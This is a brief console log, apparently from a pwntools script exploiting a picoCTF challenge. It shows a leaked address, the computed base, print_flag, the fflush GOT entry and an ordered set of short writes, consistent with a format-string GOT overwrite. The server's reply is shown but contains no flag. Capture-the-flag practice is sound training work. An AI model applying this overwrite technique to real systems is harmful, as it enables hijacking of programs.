[x] Opening connection to shape-facility.picoctf.net on port 64633
[x] Opening connection to shape-facility.picoctf.net on port 64633: Trying 3.20.150.139
[+] Opening connection to shape-facility.picoctf.net on port 64633: Done
[*] Leak: b'0x5986bb359413'
[*] Base: 0x5986bb358000
[*] print_flag: 0x5986bb359269
[*] GOT fflush: 0x5986bb35bfb8
[*] Shorts: 0x9269, 0xbb35, 0x5986
[*] Write order: [('0x5986', 8), ('0x9269', 6), ('0xbb35', 7)]
[*] Payload: 60 bytes
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 33B
[+] Receiving all data: Done (33B)
[*] Closed connection to shape-facility.picoctf.net port 64633

[*] Response:
You heard in the distance: 5Y
